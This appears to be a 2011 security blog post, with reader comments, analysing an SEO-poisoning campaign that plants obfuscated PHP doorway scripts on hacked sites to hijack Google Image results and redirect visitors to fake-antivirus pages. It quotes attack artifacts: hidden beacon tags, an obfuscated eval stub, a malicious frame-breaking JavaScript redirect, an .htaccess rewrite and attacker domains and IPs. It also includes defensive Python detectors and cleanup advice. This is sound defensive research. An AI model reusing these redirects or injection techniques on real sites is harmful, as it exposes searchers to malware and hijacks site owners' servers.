
Thousands of Hacked Sites Seriously Poison Google Image Search Results

   05 May 11   Filed in Website exploits

This investigation began a few weeks ago, when I came across the following two threads in website security forums:

[badwarebusters.org] Lately I have been seeing a huge increase in the number of hacked sites appearing on google image search results that redirect to a fake Av scanner.

[Google Webmaster Help] google image search results often has multiple infected / malware sites on the first SERP page.

This is a well known problem. I blogged about such SEO poisoning attacks several times here. This time I decided to check what’s behind the reported increase in malicious image search results.

The attack uses cloaking to feed keyword-rich pages with hot-linked images to search engine bots and return a malicious JavaScript that redirects to fake AV sites to visitors that come from search engines.

Here’s a screenshot of a typical Google Image search results page where I highlighted suspicious results. Pink frame: the image is hot-linked. Red frame: the result is outright malicious and redirects to a fake AV site. (I wish Google had similar highlighting to warn unsuspecting searchers.)

My goal was to find out

  1. how the sites were compromised and what webmasters can do to prevent such infections
  2. and whether it was possible to identify all compromised sites and have Google remove hijacked search results from its index.

Imgaaa

I began by checking the home pages of a few known hacked sites, trying to find some common patterns. Quite soon I discovered the following code at the very bottom of most of them:

<img heigth="1" width="1" border="0" src="hxxp://imgaaa .net/t.php?id=6214178">

Some alternative variants:
<img heigth="1" width="1" border="0" src="hxxp://myteenmovies .net/t.php?id=5360168">
or
<iframe heigth="1" width="1" frameborder="0" src="hxxp://curem .net/t.php?id=1517731"></iframe>
Update (May 6th, 2011): or
<img heigth="1" width="1" border="0" src="hxxp://imgddd .net/t.php?id=15433533">

The “imgaaa .net” domain didn’t resolve and the code looked suspicious so I decided to google for this imgaaa.

Quite soon I found this thread on WordPress support forum. It was the key to answering all my questions. I asked people to help with my investigation and they provided me with important internal information (e.g. .php files uploaded by hackers and some statistics). This information helped me reconstruct the whole scheme behind this attack, find thousands of infected sites and estimate the scale of the problem.

Update (May 6th, 2011): Some other domains on the same IP as imgaaa .net: imgbbb.net, imgccc .net, imgddd .net, ingeee .net.

Short description

1. Criminals use stolen FTP credentials to upload malicious .php files to compromised servers. (confirmed both by webmasters who found trojans on their computers and by hosting providers who found attack traces in FTP logs)

2. These files generate spammy web pages on-the-fly. As keyword-rich content they use a combination of top Google web search results and Image search results.

3. The generated spammy pages are interlinked to make sure Googlebot discovers them all. Moreover, they use Google’s suggested searches to generate links to new spammy pages (they will be generated on-the-fly when Googlebot follows the links). This simple scheme makes Google generate spam for its own index.

4. To have Google discover the spammy pages in the first place, criminals create blogs using free blogging services (e.g. http://blog.fc2.com/) where they post links to newly created spam-generating scripts on hacked sites.

5. Now the Google exploit in action: The combination of keywords from top Google search results for particular keywords and hot-linked images returned by Google Image search for the same keywords, makes the newly generated spammy pages appear at the top (the first page) of Google Image search results within a few days, hijacking results of sites that actually host (and usually own) the images.

This works like a charm. Exploiting this flaw, cybercriminals managed to hijack search results on the first pages of Google Image search for millions of keywords. I estimate that this trick generates at least 15 million clicks on poisoned image search results every month. (Calculations and a detailed description of how this Google exploit works can be found below.)

6. What makes this a security problem is what happens when people click on such hijacked search results. The rogue script detects a visitor that comes from search results and substitutes the spammy page with some malicious JavaScript (that in most cases redirects to fake AV sites).

Detailed reconstruction of the attack

Update (June 2011): After May 17th, the attack scheme changed slightly. You can find a description of the changes in the following post.

1. Uploading the PHP script.

Malicious hackers use stolen FTP login details to upload an obfuscated .php file to some directory on a server. They may upload several identical files with different names to different directories.

Here are the IP addresses that people usually find in FTP logs: 46.252.130.109 and 91.200.240.10.
Update (May 10th, 2011): Two comments mentioned one more IP: 91.200.241.200.

The .php script usually has a name that consists of either two random digits (e.g. 35.php) or three random letters (e.g. gmp.php).

The file contains about 11 KB of obfuscated code:

<? eval(gzuncompress(base64_decode('eNqdWNtuGkkQ/ZmVSKRVBINtZbTiAR4Yd...skipped...wV/UO/k/6QMUUQ=='))); ?>

This file is responsible for generating spammy pages, pushing malicious content and uploading additional files to a server.

2. Preparation (alcobro)

Now the uploaded script should be registered and added to a network of compromised sites. To do so, hackers make a request with the ?q=alcobro parameter.

This request prepares the hacked site. It creates the following directories:

/.log
/.log/compromiseddomain.com

where compromiseddomain.com is the domain name that I will use in this post as a replacement for the actual domain names of compromised sites.

Then it creates a file called /.log/compromiseddomain.com/xmlrpc.txt and writes the following line there: “bestnetblog.net”. This file contains the domain name of the remote server from which the script can request new malicious code.

Then it tries to create an .htaccess file with the following content:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ script-name.php?q=$1 [L]
</IfModule>

where script-name.php is the path to the uploaded .php file (e.g. /wp-admin/26.php).

These rewrite rules define “SEO-friendly” links for doorway pages. Instead of hxxp://compromiseddomain.com/wp-admin/26.php?q=search-keywords the link will read as hxxp://compromiseddomain.com/wp-admin/search-keywords/

This .htaccess file is only created if it doesn’t already exist. Otherwise, ?q=search-keywords links will be used.

Finally, the script contacts hxxp://bestnetblog .net//logdomain.php?q=compromiseddomain.com to let the criminals know that compromiseddomain.com is ready to generate doorway pages.

Alternative maintenance requests

?dom100500=<domain.com> – this request updates the content of the xmlrpc.txt file with the domain name of a malicious server that hosts fresh redirect code.

Currently they use the following domain names: love-adamcom.net, love-adambiz.net, love-adamorg.net, love-adaminfo.net – all 184.82.169.171

?up100500=<some-value> – this request turns the script into an upload form.

On one compromised site they used this functionality to upload a web shell script called avuv.php.

Processing q requests

The main function of the script is to process ?q=search-keywords requests (or /search-keywords when the .htaccess rewrite rules are in place).

The script distinguishes three different situations:

  1. Request from a search engine bot (determined by the IP address). In this case the script generates a keyword-rich page (see the algorithm below) and feeds it to the bot.
  2. Visitor that clicked on a search engine result on Google, Yahoo or Bing (determined by the referrer header). In this case the script returns a malicious JavaScript.
    Note 1: the malicious JavaScript is not returned if the search query contains the “site:” operator (to hide the malicious content from site owners and tools that rely on this operator).
    Note 2: the malicious JavaScript is always returned if your browser is Opera (even if you don’t come from a search engine).
  3. All other requests are simply redirected to the homepage.
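The three request classes above leave a recognisable footprint in a server’s access log: the same non-existent path served with HTTP 200 to a search engine bot and then to a visitor whose referrer is a search results page, plus the ?q=alcobro and ?…100500 maintenance requests. As an added example (not code from the original post or from the attack), the following Python script parses Apache combined-format log lines and flags those footprints. The log lines, IP addresses and keyword paths are constructed for the demonstration; matching bots by User-Agent is an assumption of this script, since the doorway script itself identifies bots by IP.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache "combined" format; IPs are documentation
# ranges, not real crawler or visitor addresses.
BOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6"
SAMPLE_LOG = [
    f'192.0.2.50 - - [19/Mar/2011:10:02:11 +0000] "GET /wp-admin/26.php?q=alcobro HTTP/1.1" 200 512 "-" "{BOT_UA}"',
    f'192.0.2.50 - - [19/Mar/2011:10:05:43 +0000] "GET /wp-admin/sarpagandha/ HTTP/1.1" 200 18234 "-" "{BOT_UA}"',
    f'192.0.2.50 - - [19/Mar/2011:10:05:44 +0000] "GET /wp-admin/26.php?q=rauvolfia+serpentina HTTP/1.1" 200 18190 "-" "{BOT_UA}"',
    f'198.51.100.7 - - [20/Mar/2011:14:31:02 +0000] "GET /wp-admin/sarpagandha/ HTTP/1.1" 200 611 "http://www.google.com/imgres?q=sarpagandha&tbm=isch" "{BROWSER_UA}"',
    f'203.0.113.9 - - [20/Mar/2011:14:40:55 +0000] "GET /about/ HTTP/1.1" 200 9532 "http://www.google.com/search?q=example+company" "{BROWSER_UA}"',
    f'192.0.2.50 - - [20/Mar/2011:16:12:00 +0000] "GET /about/ HTTP/1.1" 200 9532 "-" "{BOT_UA}"',
    '198.51.100.8 - - [20/Mar/2011:15:01:12 +0000] "GET /wp-admin/35.php?up100500=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
MAINTENANCE_PARAMS = {"dom100500", "up100500"}   # maintenance requests documented in the post
SEARCH_HOSTS = ("google.", "bing.", "yahoo.")    # referrers the doorway script reacts to
BOT_MARKERS = ("googlebot", "bingbot", "slurp")  # User-Agent approximation of "bot"


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_search_referer(referer):
    """True when the Referer host belongs to Google, Bing or Yahoo."""
    host = urlsplit(referer).netloc.lower()
    return any(marker in host for marker in SEARCH_HOSTS)


def is_search_bot(ua):
    """The doorway script identifies bots by IP; matching the User-Agent is the
    cheap log-side approximation used here, so treat a hit as a hint, not proof."""
    return any(marker in ua.lower() for marker in BOT_MARKERS)


def classify(entry):
    """Return the set of indicator tags for one parsed entry."""
    tags = set()
    qs = parse_qs(urlsplit(entry["target"]).query)
    if qs.get("q") == ["alcobro"]:
        tags.add("alcobro-registration")
    elif "q" in qs:
        tags.add("q-keyword-request")       # ?q=search-keywords doorway request
    if MAINTENANCE_PARAMS.intersection(qs):
        tags.add("maintenance-request")     # ?dom100500= / ?up100500=
    if is_search_bot(entry["ua"]):
        tags.add("bot")
    if is_search_referer(entry["referer"]):
        tags.add("search-visitor")
    return tags


def find_doorways(lines, legit_paths):
    """Report maintenance requests and paths outside the legitimate site that were
    served (HTTP 200) both to a search bot and to a search-engine visitor, or that
    carry a ?q= keyword: the cloaking footprint described in the post."""
    seen = defaultdict(set)
    maintenance = []
    for line in lines:
        entry = parse_line(line)
        if entry is None or entry["status"] != "200":
            continue
        tags = classify(entry)
        if tags & {"alcobro-registration", "maintenance-request"}:
            maintenance.append(entry["target"])
        path = urlsplit(entry["target"]).path
        if path not in legit_paths:
            seen[path] |= tags
    doorways = sorted(
        p for p, t in seen.items()
        if {"bot", "search-visitor"} <= t or "q-keyword-request" in t
    )
    return {"doorways": doorways, "maintenance": maintenance}


if __name__ == "__main__":
    for kind, hits in find_doorways(SAMPLE_LOG, {"/", "/about/"}).items():
        print(kind, hits)
```

The set of legitimate paths passed to find_doorways can be built from a sitemap or from the files actually present in the web root; anything outside it that draws both bot and search-referred traffic deserves a “Fetch as Googlebot” check.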

Perfect doorway generator (algorithm)

To generate a web page that can hijack image search results for a “search-keywords” query, the script does the following:

1. Get descriptions of the top 50 Google web search results for “search keywords”.

2. Shuffle the words in those descriptions randomly to get some unique text.

The resulting text is not intelligible, but it’s enough to exploit this Google flaw. Here’s an excerpt from a real spammy page that targets the “sarpagandha” keyword:

“It has been used since ages in Print e-mail ayurveda herb finder miscategorized Tablets, sarpagandha experts belongs Advice on ayurvedic medicines herbalsarpagandha Linn, family botanical name rauvolfia serpentina…”

3. Get top 20 Google Image search results for “search keywords” and extract links to image files.

4. Generate <img> tags for each extracted image link. E.g.

<img src="http://www.hijacked-site1.com/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)">

5. Shuffle the generated <img> tags (to change their order)

6. Break the text generated in step #2 into sentences and mix them with the <img> tags. The result is keyword-rich HTML with hot-linked images for the “search keywords” query.

7. To facilitate discovery of new pages and to provide them with incoming links, each spammy page contains a section that links to 30 most recently generated doorway pages.

8. Get up to 10 suggested keywords from Google autocomplete and use them to generate links to doorway pages that target these suggested keywords. This way Google itself suggests which search keywords should be targeted. Spammers only need to come up with a few initial keywords; the rest Google does itself.

9. At the bottom of each spammy block, there is a section of links to 6 alternative pages for the same “search keywords”. The links look like this:

<p><a href="http://compromiseddomain.com/search-keywords&page=2" title="Search Keywords">Search Keywords - Page 2</a> | ...skipped.... >Search Keywords - Page 7</a></p>

All those pages are generated the same way. The only difference is the page #2 takes image links from the second page of Google Image search results, the page #3 from the third page of image search results, and so on. The textual parts of these pages use absolutely the same words, only in a different (random) order.

10. Spammy block template. Then the algorithm concatenates all the generated parts into a single block that looks like this:

<h1>SEARCH KEYWORDS</h1>
suggested links
links to 30 most recently generated links
keyword-rich text with hot-linked images
links to alternative pages

11. Spammy page template. So that this generated spammy block doesn’t look too outlandish, it is inserted in the middle of the HTML code of the real homepage of the compromised site.

The HTML template is stored in the .log/compromiseddomain.com/shab100500.txt file. It’s basically the HTML code of the site’s homepage with the <REPLACEME> placeholder, that will be later replaced with a generated spammy block.

A few more important modifications to this template are made when the script generates spammy pages:

  • the original <title> tag is replaced with <title>Search Keywords</title>
  • and the <meta name="googlebot" content="noarchive"> tag is inserted. That’s why you don’t see cached copies of the pages in Google search results, which definitely makes diagnosing the problem more difficult for webmasters. (Fortunately, they can still use the “Fetch as Googlebot” tool in Google Webmaster Tools.)

Caching

Once the spammy page is generated, it is saved on disk so that all subsequent requests to the same page will be served directly from cache.

The cached pages are saved in the .log/compromiseddomain.com/ directory and have the following filenames:

The first page: .log/compromiseddomain.com/search-keywords.html
Page #N: .log/compromiseddomain.com/search-keywords.htmlN, where N is a number from 2 to 7

Since the spammy pages are only generated for search engine bots, the number of cache files provides us with quite an accurate number of indexed spammy pages. (It is not always possible to come up with Google search queries that return only spammy pages and at the same time all spammy pages on a particular domain.)

I’ve checked cache directories on many hacked sites. I rarely saw fewer than 1,000 files there. Some sites even had more than 100,000 cache files created in less than three months.

Sidenote: The spammy pages are only generated when Googlebot tries to index them. Moreover, three Google services are utilized in the spam generation process. Effectively, Google itself generates the spam that poisons its index! What an irony!

Malicious redirects.

Let’s get back to real people who click on poisoned image search results. When the script detects a victim (visitor from Google, Yahoo or Bing) it returns some malicious code instead of the requested spammy page.

This malicious code is stored in the .log/compromiseddomain.com/iog.txt file and looks like this:

var url = "hxxp://wcwrwpea .cz.cc/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default";
if (window!=top) {top.location.href = url;} else document.location= url;

Note how it breaks out of the frames. Google’s Image search interstitial pages can’t stop the redirect.

This file is being updated every 30 minutes. Remember the xmlrpc.txt file that contains the address of the remote server? This is where this address is used.

Every 30 minutes the script pulls new malicious script from
hxxp://remote-server-from-xmlrpc-txt/badcompany.php?q=compromiseddomain.com/script-name.php

So far the only changes are the domain names of sites where the script redirects web surfers to. Here are just a few domains used in this attack:

oppuvjyz .cz.cc, sljngefn .cz.cc, qtmgqqxh .cz.cc, qeiskziv .cz.cc, jfdevxvo.cz.cc, zpggpimd .cz.cc, uywgxabe .cz.cc, hdmibzur .cz.cc, kjqxyxiu .cz.cc, wcwrwpea .cz.cc

These domains have a very short lifetime, so security tools that rely on blacklists simply don’t have enough time to flag them and update their blacklists. That’s why Google’s Safe Browsing database, which is used by many modern web browsers, is of very little help here. Moreover, Google even has a hard time finding and blacklisting the malicious doorway pages on hacked sites. Less than 5% of them are currently flagged.

Note that although the doorway pages currently return malicious scripts that redirect to fake AV sites, they can easily be changed to any other type of JavaScript: it can be a browser exploit or a redirect to some shady content (e.g. porn, pirated stuff, counterfeit drugs, gambling sites, etc).

Statistics and estimates

This scheme works extremely well for spammers. It exploits the flaw in Google Image search so well that the doorway pages inevitably make it to the first pages of image search results for almost every keyword combination that consists of at least a couple of words. Let me prove it with some numbers.

I have compiled a list of 5,000+ hacked sites (the list is incomplete) with millions of doorway pages. And I have a very long list of keywords targeted by the spammy pages. I tried to check more than a hundred of random Google Images searches from that list — for most of them (~90%) I found at least one hijacked search result on the first page. In about 50% of cases there were more than one poisoned search results within the top 20. For some keywords, poisoned search results occupied more than half positions on the first page of results. Results below top 20 were poisoned even more seriously.

And the main problem is not that cybercrooks managed to seriously poison Google Image search results but the fact that many people do click on such results and get exposed to malicious content.

I’ve received logs from some hacked sites and can estimate the traffic Google sends to such doorway pages.

An average hacked site has ~1,000 indexed doorway pages.
There are 5,000+ hacked sites that I know of.
This gives us 5,000,000+ indexed doorway pages.
An average doorway page has 1 visitor from Google every 10 days.
So all doorway pages should have 500,000+ visits from Google every day
Or 15,000,000+ visits every month

Note that this is probably an underestimation, since I used numbers on the lower side.

Update (May 16th, 2011): I seem to be right about underestimation. Check this Trend Micro article and their numbers: ~ 3 million unique visitors from Google on the average day, 26+ million uniques in just the first 10 days of May (with a declining trend after May 5th, when Google started to actively blacklist doorway sites.)

And don’t forget that these are the statistics for this particular SEO poisoning attack. There are currently at least a few other similar active attacks that make things significantly worse.

Here’s a representative example: a small hacked Croatian site with PageRank 0. FTP logs showed that it had been hacked on March 18th. According to access logs, on March 19th Google started to index doorway pages. During the next 5 weeks it indexed 27,200+ doorway pages on this site. During the same 5 weeks Google Image search sent 140,000+ visitors to this small site. Very impressive, isn’t it?

The most efficient black hat trick ever

I would call this the most efficient and easy to implement black hat SEO trick to drive search traffic to a site. And you don’t actually need to hack someone else’s sites — you can implement this on your own site with similar results. Of course, you should be ready that someone reports your site to Google and they remove it from their index altogether, but you can still enjoy having thousands of visitors literally for free before this happens.

But don’t be late to the party! Many black hats already exploit this flaw in Google Image search. It may happen that most of Google Image search results will be hijacked and re-hijacked quite soon and normal people will simply stop using Google for image searches.

To Google

Google, I hope you hear my sarcasm. Is there any chance you’ll close this security hole?

I know, you can’t remove hot-linking sites from image search results altogether for numerous reasons (although it would definitely fix the problem), but you should consider some other steps that could mitigate the problem and you should do it ASAP!

Here are just a few ideas that come to my head:

  • Give some preference to sites that actually host image files. Don’t encourage image theft.
  • Improve cloaking and web spam (pages with unintelligible texts should not rank high!) detection.
  • Cooperate with the anti-malware team and have them scan freshly discovered pages that hot-link more than, say, three images. (I hope that malware scanners will eventually be able to detect malicious behavior on such doorway pages.)

Meanwhile, I’m sending my list of 5,000+ hacked sites to Google’s web spam team and to their webmaster trends analysts. I hope you’ll be able to make good use of it and remove these doorway pages from search results.

To Webmasters

To make sure your site is not abused by cybercrooks you should:

  • regularly check what pages Google has indexed on your site
    • use the “site:” searches
    • check statistics in Google Webmaster Tools
  • Regularly check what search keywords people use to find your site. Google Analytics won’t help here as it only tracks data for your legitimate web pages.
    • Use search data in Google Webmaster Tools
    • Regularly check raw access logs or tools that analyze access logs (e.g. Webalizer)
  • Scan your server for suspicious files and directories. It’s a good idea to have some sort of integrity control or version control so that you can easily detect unauthorized changes.
  • Don’t save passwords in FTP programs. Change passwords every time you find malware on your computer.
  • Make sure your computer is free from malware. Use a reputable anti-virus tool and regularly update it.
  • Keep your operating system, web browser and all browser plugins (e.g. Java, Flash) up-to-date. This will help minimize risk of malware infections that may result in site password theft.

If your site happens to be one of the compromised sites that host malicious doorway pages:

  • Thoroughly scan your computer for malware
  • Once your computer is clean, change all site passwords (even for sites that don’t seem to be compromised yet). Don’t save passwords in FTP clients – most of them can’t protect your passwords from malware. Consider using password managers (like KeePass) that encrypt all data with a master password.
  • Use SFTP instead of FTP if possible.
  • Now remove the doorway .php script, .htaccess file with rewrite rules if it was created, the .log/ directory and all its content.
  • You should also scan your server for suspicious files that might have been uploaded to your server using the ?up100500 requests.
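The cleanup list above, the injected hidden <img>/<iframe> tags found at the bottom of home pages, the obfuscated eval(gzuncompress(base64_decode( … ))) script and the catch-all .htaccess rewrite all come down to recognisable file-system artifacts. As an added example (not code from the original post), the following Python scanner walks a web root and reports them: the .log/ cache directory, an .htaccess that rewrites every missing path to a .php?q=$1 script, .php files using that obfuscation wrapper, and 1×1 img/iframe tags pointing at t.php?id=. The sample web root it builds in a temporary directory, and the .invalid domains in it, are constructed for the demonstration.

```python
import os
import re
import tempfile
from pathlib import Path

# Signatures of the artifacts described in the post. Domains in the sample tree
# below are constructed placeholders (.invalid), not the real ones.
INJECTED_TAG_RE = re.compile(
    r'<(?:img|iframe)\b[^>]*\bsrc=["\']https?://[^"\']+/t\.php\?id=\d+', re.I)
OBFUSCATED_PHP_RE = re.compile(
    r'eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(', re.I)
CATCHALL_REWRITE_RE = re.compile(
    r'RewriteRule\s+\^\(\.\*\)\$\s+\S+\.php\?q=\$1', re.I)
TEXT_SUFFIXES = {".php", ".html", ".htm", ".asp", ".txt"}   # files worth grepping


def read_text(path):
    return Path(path).read_text(encoding="utf-8", errors="replace")


def scan_tree(root):
    """Walk a web root and return sorted (relative path, indicator) pairs."""
    root = Path(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = Path(dirpath).relative_to(root)
        for d in dirnames:
            if d == ".log":             # cache/config dir created by the ?q=alcobro request
                findings.append((str(rel_dir / d), "doorway-cache-dir"))
        for name in filenames:
            path = Path(dirpath) / name
            rel = str(rel_dir / name)
            if name == ".htaccess":
                if CATCHALL_REWRITE_RE.search(read_text(path)):
                    findings.append((rel, "catch-all-rewrite-to-php"))
                continue
            if path.suffix.lower() not in TEXT_SUFFIXES:
                continue
            body = read_text(path)
            if path.suffix.lower() == ".php" and OBFUSCATED_PHP_RE.search(body):
                findings.append((rel, "obfuscated-php"))
            if INJECTED_TAG_RE.search(body):   # hidden 1x1 img/iframe to t.php?id=
                findings.append((rel, "injected-tracking-tag"))
    return sorted(findings)


def build_sample_tree():
    """Create a constructed web root mixing clean files with the attack's
    artifacts, and return its path (a temporary directory)."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "index.html").write_text(
        "<html><body>Welcome</body>\n"
        '<img heigth="1" width="1" border="0" src="http://imgaaa.invalid/t.php?id=6214178">\n'
        "</html>\n")
    (root / "about.html").write_text(
        '<html><body><img src="/logo.png" alt="logo"></body></html>\n')
    (root / ".htaccess").write_text(
        "<IfModule mod_rewrite.c>\nRewriteEngine On\n"
        "RewriteCond %{REQUEST_FILENAME} !-f\nRewriteCond %{REQUEST_FILENAME} !-d\n"
        "RewriteRule ^(.*)$ /wp-admin/26.php?q=$1 [L]\n</IfModule>\n")
    wp = root / "wp-admin"
    wp.mkdir()
    (wp / "26.php").write_text(
        "<? eval(gzuncompress(base64_decode('eNqdWNtuGkkQ...truncated...'))); ?>\n")
    (wp / "admin.php").write_text("<?php echo 'legitimate file'; ?>\n")
    cache = root / ".log" / "compromiseddomain.com"
    cache.mkdir(parents=True)
    (cache / "xmlrpc.txt").write_text("bestnetblog.invalid\n")
    return root


if __name__ == "__main__":
    for rel, indicator in scan_tree(build_sample_tree()):
        print(f"{indicator:26} {rel}")
```

Run scan_tree against the real document root (and against every directory the FTP account can write to, since the script may be uploaded several times under different names); compare the result with a known-good backup or version control before deleting anything.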


Did you ever come across Google Image search results that redirected to malicious sites? Maybe your site was a victim of a similar attack? Or maybe this flaw seriously affects your site because spammers hijack your search results in Google Image search?

Your comments and stories are welcome!


This post has made it to the news. You might want to read what journalists and security professionals have to say about this problem.


Reader's Comments (47)

  1. |

    My mother was looking for picasso paintings, and clicked on a spammy link that redirected her to a rogue AV. I see now why it happened. I had educated her on looking at the domain name to see if it was in some way related to the topic she was searching for, but in this case, it was. And it was the 3rd result in the search. Luckily, I showed her how to recognize a spammy site and ignore the “WARNINGS!!!” that they give. Hope Google fixes this soon.

    • |

      Indeed, it’s not that easy to tell where some image result points to.

      I’ve created a Firefox addon that highlighted hot-linked image results and results that pointed to outright malicious sites (based on their URL pattern). You can see a screenshot of how this addon works in this post. I know it’s not perfect yet but it helped me a lot during the investigation. You can see at a glance all suspicious results. If Googlers had this addon on their computers they would definitely start to fix this ASAP – for some keywords I saw about 70% of red-framed thumbnails (poisoned search results)

      • |

        Denis,

        Do these images show as being “hot-linked”?

        http://www.google.com/search?tbm=isch&hl=en&source=hp&biw=1680&bih=886&q=site%3Asafeandsavvy.f-secure.com&gbv=2&aq=f&aqi=&aql=&oq=

        They are from F-Secure’s Safe and Savvy blog, a VIP WordPress.com site, and so the images are hosted at WordPress.com while the site is “f-secure.com”.

        How about sites that host images using Amazon’s cloud services, will those be detected as “hot-linked” by your add-on?

        Thanks!
        Sean

        • |

          Hi Sean,

          Sure, most of them are displayed with a pink frame since the domain name of the web-page doesn’t match the domain name of an image.

          But that’s OK since I created this addon to facilitate my own research. Pink frame is just a sign for me. The red frame is a much stronger signal and more accurate detection of malicious results (based on URL pattern analysis of doorway sites).

          I have some ideas on how to make this addon more usable for general public, though. But I’m still not sure whether it is worth it to publish this addon.

          • |

            Thanks for the info, Denis.

            Given that there are many legitimate hot-linking hosts, is it perhaps a bit too strong to use: “Don’t encourage image theft.”?

            I think that at least the ‘pink’ result addon would be useful for research. However Google adjusts their methods to combat Image SEO, I believe they’ll likely continue to index hot-linked images. (I hope that they highlight hot-linked images in the UI.)

            I’d imagine that the ‘red’ results will evolve over time, becoming either less effective, or a maintenance burden for you.

            Cheers,
            Sean

          • |

            Sean,

            > Given that there are many legitimate hot-linking hosts, is it perhaps a bit too strong to use: “Don’t encourage image theft.”?

            Here I’m talking about the situation when Google prefers hot-linking sites to the sites that actually host/own the image.

            So if there is an image siteA.com/image.jpg and some page siteA.com/page1.html that has existed for a long time and ranks on the first page of Google Image search results (I guess Google does it for a good reason).

            Here comes a new/small siteB.com and creates a page siteB.com/page2.html that hot-links siteA.com/image.jpg using some keyword optimization.

            Now Google displays a thumbnail for siteA.com/image.jpg somewhere at the top of image search results, but since there is more than one page that contains that image, Google needs to choose only one of them. In about 80% (in my experience) Google will choose a small/new hot-linking site. Effectively, siteB hijacks image search results of reputable siteA.

            That’s why I say that Google should give some preference to sites that own the image, when it chooses which page to link a particular image search result to.

            I’m not talking about the competition between different images.

            > a maintenance burden for you

            That’s a very good point. Actually I’ve noticed some changes in the way Google Image search started to return images after I published my article. This change made my addon work inconsistently for some result sets.

            The addon relies on a format of search result pages that Google can change any moment and on URL patterns of doorway pages that can change too. That definitely sounds like a maintenance hell.

            I’d prefer if Google redesigned the UI of image search results to make more information about search results available before people actually click on them.

  2. |

    [...] be plagued with malicious links.”Denis Sinegubko, a Russian malware researcher who has been studying the fake anti-virus campaigns, called this tactic “the most efficient black hat trick ever,” and said it is [...]

  3. |

    [...] You can read his full article here. [...]

  4. |

    I think Google should put a quick solution for us webmasters to be able to delete the spammed search result in their directory.

  5. |

    These kind of pages always pop-up at school when people use Google Images. It’s always happening now, and we can’t stop it.

    • |

      I hope the thing will improve. At least I can see significantly less hijacked image search results on the first pages since I published this blog post and sent my information to Google. And many sites with doorways have been blacklisted by Google since then. Of course it helps only if you use web browsers that use Safe Browsing data: Firefox, Safari and Google Chrome.

      I hope these changes won’t be temporary and Google will be able to identify and remove malicious pages from its index.

  6. |

    Denis,

    Thanks for an excellent post. I wish I would have seen it earlier…. It helped me understand what had happened to many of my sites. I still have 2 problematic sites.
    On one site I found all three types of files (.log, .php and htaccess changes). I erased these files but the malware pages listed in Webmaster tools still bring me to my homepage and not a 404 error (I also posted this question in Webmaster forum but wasn’t sure if you would see it).
    On another site I have a different problem. In Webmaster tools I don’t have a list of problematic files but only this code:
    I added spaces to the URL. I didn’t find any of the three types of files in that domain. How do I get rid of the malware?
    Thanks again for your help!

    • |

      I partly answered your question in Webmaster forum.

      Regarding the other sites: consider posting their URLs in the forum or send them directly to me.
      Sometimes hackers don’t create doorway pages on some compromised sites, but since Google finds the injected “imgaaa” code in index pages (index files in all directories may be infected), it can blacklist such sites. So make sure to find and remove such code.

  7. |

    Thanks Denis – the URL is http://www.projectstomake.com/

  8. |

    [...] keywords (recently e.g. “Osama bin Laden”). The situation is serious; estimates show that, every month, the planted malicious pages may receive as many as 15 million [...]

  9. |

    Thank you for this post!
    I was thankfully on my FTP when I saw that weird .log folder being created, then the avast antivirus started to pop up alerts with the malicious URL. I’ve found this post quickly and solved the problem. Thumbs up!

  10. |

    Hi Denis,

    I work at a school with a one-to-one program (a laptop for every student) and we have lately seen the number of viruses skyrocket in the past two weeks – usually the exact same virus, and it’s taken until today (thanks to your post) to figure out how it was being done and now all that’s left is how to prevent it.

    I’ve been doing research today and so far the most effective way to prevent the infection from searches is to disable JavaScript on your browser (unfortunately this presents numerous problems on other sites) and so some have suggested creating a WhiteList for trusted websites – a little better but doesn’t stop users from adding a non-suspicious site to the whitelist and getting infected.

    Unfortunately the school uses Internet Explorer which doesn’t support Exceptions to turning JavaScript off, so my question is, is there any way to prevent users from searching or clicking on infected search results in Internet Explorer? Is there an add-on/plugin, or any way to tell? Maybe a way to prevent the computer from being infected once you find that the result is malicious?

    Any more information on prevention would be excellent. Also, would you have an example of a search term I could use to attempt to infect one of our machines? We’re attempting to test our anti-virus at the same time, and anything else that will prevent these viruses.

    Thanks for an excellent post! :)

    • |

      Hi Corey,

      I only use IE for Windows updates on Win computers, so I don’t know much about its advanced security features that could help here.

      For me, Firefox+NoScript is the best possible combination. Maybe you can make your school switch to Firefox. I guess it’s a good idea to teach students best practices of safe web browsing.

      Anyway, white-listing may work reasonably well for this particular attack that changed domain names of the malicious sites several times a day. Even if someone adds such a bad site into the white list by mistake, the chances that other users will be redirected to that site are very small.

      And if you have black lists, I suggest that block the entire .CC TLD. Too many attacks use this domain lately.

      To minimize risks of fakeAV installs, make sure to configure IE so that it doesn’t automatically launches downloaded executable files. It should always ask where you want to save something, and don’t allow automatic downloads. This way (I believe) you have a chance to stop undesired download. If you can’t do it, then Ctrl+Alt+Del and stop your browser process.

  11. |

    My website became affected today. Actually the attack happened on 5/3/2011 and I have removed the files.

    I have found no evidence in the FTP logs that something was uploaded. I also do not run any PHP scripting server. Is it possible there is a version using ASP?

    • |

      What files did you remove? That’s important.

      Since your server doesn’t support PHP, the attackers might have decided not to upload .php scripts. Instead they only injected the “imgddd” code into your existing index files. In this case, you won’t see any new file uploads in FTP logs, but you will see how they download index files and then upload them again, with a slightly changed file size.

      • |

        i just had the following code added to a number of index.htm and index.asp pages on my server

        So now I need to know how they managed to modify these pages. What string should I search for in my web server logs?

        thanks

        Matthew

        • |

